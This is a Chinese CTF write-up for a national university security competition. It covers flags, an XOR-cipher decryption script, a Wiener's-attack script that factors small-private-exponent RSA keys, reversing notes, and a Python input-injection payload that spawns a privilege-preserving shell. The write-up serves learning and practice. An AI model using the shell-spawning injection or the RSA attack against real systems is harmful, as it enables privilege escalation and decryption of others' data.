[WP]全国大学生信息安全竞赛--创新实践能力赛 初赛
1.签到
flag{同舟共济扬帆起,乘风破浪万里航。}
2.the_best_ctf_game
打开看到flag
flag{65e02f26-0d6e-463f-bc63-2df733e47fbe}
3.电脑被黑
解压文件,在/misc01/ 中发现ELF文件demo,加密的文件fakeflag.txt
demo是一个加密程序,对其编写解密脚本,解密fakeflag后发现并不是需要的flag
分析加密流程,'flag'加密出来对应0x44 ,0x2A ,0x03 ,0xE5 ,0x29 ,..
disk_dump中搜索,第一串匹配的对应fakeflag加密获得的密文
第二串匹配的对应真实flag加密获得的密文
解密脚本
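#include <stdio.h>
#include <iostream>
#include <string>
using namespace std;

// Recovers the plaintext of a ciphertext produced by the `demo` ELF from
// challenge 3. Each ciphertext byte is the low byte of v4 ^ (v5 + plain),
// where v4 and v5 are running key state. The plaintext byte is found by
// trying every 7-bit ASCII value against the current key state.
int main() {
    // Ciphertext of the decoy flag (first match in disk_dump), kept for reference:
    // int fakeencode[]={0x44 ,0x2A ,0x03 ,0xE5 ,0x29 ,0xBC ,0x96 ,0x7F,0x55 ,0x35 ,0x1B,0xE1,0xDD ,0xA4 ,0x85 ,0xA2 ,0x1D ,0x0E ,0xEF ,0xD0 ,0xA7 ,0x6B};

    // Ciphertext of the real flag (second match in disk_dump).
    int encode[] = {0x44, 0x2A, 0x03, 0xE5, 0x29, 0xA3, 0xAF, 0x62, 0x05, 0x31,
                    0x4E, 0xF3, 0xD6, 0xEB, 0x90, 0x66, 0x24, 0x5C, 0xB7, 0x92,
                    0xF6, 0xD7, 0x4D, 0x0B, 0x6A, 0x41, 0xA3, 0x85, 0xEF, 0x90,
                    0x5A, 0x7E, 0x5B, 0xEC, 0xC1, 0xF0, 0xD4, 0x61, 0x12, 0x12,
                    0x45, 0xEB};

    // Take the length from the array itself. The original loop ran to a
    // hard-coded 45 and read three ints past the 42-entry array, which is
    // undefined behaviour.
    const int count = (int)(sizeof(encode) / sizeof(encode[0]));

    int v4 = 34;  // XOR key; grows by 34 after every recovered character
    int v5 = 0;   // additive offset; grows by 2 and wraps at 4 bits

    for (int i = 0; i < count; i++) {
        bool found = false;
        for (int j = 0; j <= 127; j++) {
            // Only the low byte of the keyed value is stored in the ciphertext.
            if (((v4 ^ (v5 + j)) % 0x100) == encode[i]) {
                printf("%c", j);
                v4 += 34;
                v5 = (v5 + 2) & 0xf;
                found = true;
                break;
            }
        }
        if (!found) {
            // The key state only advances on a match, so continuing after a
            // miss would silently decode every later byte with the wrong key.
            fprintf(stderr, "\nno 7-bit plaintext byte matches ciphertext index %d\n", i);
            return 1;
        }
    }
    return 0;
}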
flag{e5d7c4ed-b8f6-4417-8317-b809fc26c047}
8.bd
Wiener 攻击(wienerAttack):e 与 n 位数相近,推测私钥指数 d 很小,用 e/n 的连分数渐近分数枚举候选 (k, d),进而分解 n
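import math
import time

# Wiener's attack on RSA, ported from the original Python 2 listing to Python 3.
# gmpy2.isqrt / gmpy2.invert are replaced by math.isqrt and pow(e, -1, m)
# (Python 3.8+), so the script needs only the standard library.
#
# The attack succeeds only when the private exponent d is small (roughly
# d < n**0.25 / 3). Keys generated the usual way (a fixed small public
# exponent such as 65537 and a full-size d) are not exposed to it; the
# weakness comes from choosing a small d, typically to speed up decryption.


def continuedFra(x, y):
    """Return the continued-fraction expansion of x / y as a list of integer quotients."""
    cF = []
    while y:
        # Floor division keeps the quotients exact for arbitrarily large ints.
        cF.append(x // y)
        x, y = y, x % y
    return cF


def Simplify(ctnf):
    """Fold continued-fraction terms into a single fraction.

    Returns ``(q, p)`` where ``p / q`` is the value of the continued fraction
    ``ctnf``. For a prefix of the expansion of e / n this is read by the caller
    as ``(d, k)``, since e / n approximates k / d.
    """
    q, p = 0, 1
    for term in reversed(ctnf):
        q, p = p, term * p + q
    return (q, p)


def calculateFrac(x, y):
    """Return the convergents of x / y as a list of ``(q, p)`` pairs (see Simplify).

    The last convergent (x / y itself) is left out, as in the original listing.
    """
    cF = continuedFra(x, y)
    return [Simplify(cF[:i]) for i in range(1, len(cF))]


def solve_pq(a, b, c):
    """Return the two roots of a*x^2 + b*x + c = 0 using integer arithmetic.

    The roots are exact only when the discriminant is a perfect square; callers
    must check the result. Raises ValueError if the discriminant is negative.
    """
    par = math.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)


def wienerAttack(e, n):
    """Try to factor n from (e, n) when the private exponent is small.

    Returns ``(p, q)`` on success. If no convergent yields a factorisation,
    prints 'not find!' and returns None.
    """
    for (d, k) in calculateFrac(e, n):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        # p and q are roots of x^2 - (n - phi + 1) x + n; the sign of the
        # linear term is flipped here, so the roots come back negated.
        b = n - phi + 1
        if b * b - 4 * n < 0:
            # A wrong phi candidate can make the discriminant negative;
            # skip it instead of letting isqrt raise.
            continue
        p, q = solve_pq(1, b, n)
        if p * q == n:
            return abs(int(p)), abs(int(q))
    print('not find!')
    return None


def main():
    """Run the attack on the challenge parameters and print the recovered plaintext."""
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
    n = 86966590627372918010571457840724456774194080910694231109811773050866217415975647358784246153710824794652840306389428729923771431340699346354646708396564203957270393882105042714920060055401541794748437242707186192941546185666953574082803056612193004258064074902605834799171191314001030749992715155125694272289
    e = 46867417013414476511855705167486515292101865210840925173161828985833867821644239088991107524584028941183216735115986313719966458608881689802377181633111389920813814350964315420422257050287517851213109465823444767895817372377616723406116946259672358254060231210263961445286931270444042869857616609048537240249
    c = 37625098109081701774571613785279343908814425141123915351527903477451570893536663171806089364574293449414561630485312247061686191366669404389142347972565020570877175992098033759403318443705791866939363061966538210758611679849037990315161035649389943256526167843576617469134413191950908582922902210791377220066

    factors = wienerAttack(e, n)
    if factors is None:
        # The original unpacked the None result and died with a TypeError.
        raise SystemExit(1)
    p, q = factors
    print('[+]Found!')
    print(' [-]p =', p)
    print(' [-]q =', q)
    print(' [-]n =', p * q)
    d = pow(e, -1, (p - 1) * (q - 1))
    print(' [-]d =', d)
    m = pow(c, d, n)
    # to_bytes avoids the odd-length hex string that '{:x}'.format(m) can produce.
    plaintext = m.to_bytes((m.bit_length() + 7) // 8, 'big')
    print(' [-]m is:' + plaintext.decode('utf-8', errors='replace'))
    print('\n[!]Timer:', round(time.perf_counter() - start, 2), 's')
    print('[!]All Done!')


if __name__ == '__main__':
    main()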
flag{d3752538-90d0-c373-cfef-9247d3e16848}
10.babyjsc
直接提权
# Input submitted to the challenge service (an expression, not a script to run locally).
# It imports `os` inline and calls os.execl, which replaces the running process
# with the named program; 'sh' is passed as argv[0] and '-p' as its argument.
# NOTE(review): presumably the service evaluates user input as a Python
# expression (e.g. Python 2 input()) while running with elevated privileges,
# and '-p' keeps the shell from dropping them. The page does not show the
# service code; confirm against the challenge binary.
# Defensive takeaway: never pass untrusted input to eval()/input() in Python 2;
# read it as a string (raw_input) or parse it with ast.literal_eval.
__import__('os').execl('/bin/sh/','sh','-p')
flag{c4e39be1-666e-43c4-bf9c-3b44bd280275}
15.z3
动态调试得到dst值
然后通过矩阵运算解42元1次线性方程组得到ascii码,这里发现可以七行一组分开解,解码后得到答案
flag{7e171d43-63b9-4e18-990e-6e14c2afe648}
16.hyperthreading
输入加密后会与内置变量进行比较;调试发现每个字符加密后的密文与它所在的位置无关,因此可以构造一张“字符→密文”对照表(文中称彩虹表,实际是逐字符的查找表)
输入‘abcdef123456789-{}’进行加密
nop掉两个跳转避免异常退出
00361306 |. 3A88 50213600 |cmp cl,byte ptr ds:[eax+0x362150] 在此处下断点并监控 cl 与 [eax+0x362150] 的值:其中一边是输入字符加密后的结果,另一边是用来比较的内置密文
字符对应加密后得到的彩虹表
比较的密文,按表替换解密
几个字符没有替换到(应是因为输入的字符集 ‘abcdef123456789-{}’ 中不含 ‘l’、‘g’ 等字符),不过flag括号里的内容已经完整了
flag{a959951b-76ca-4784-add7-93583251ca92}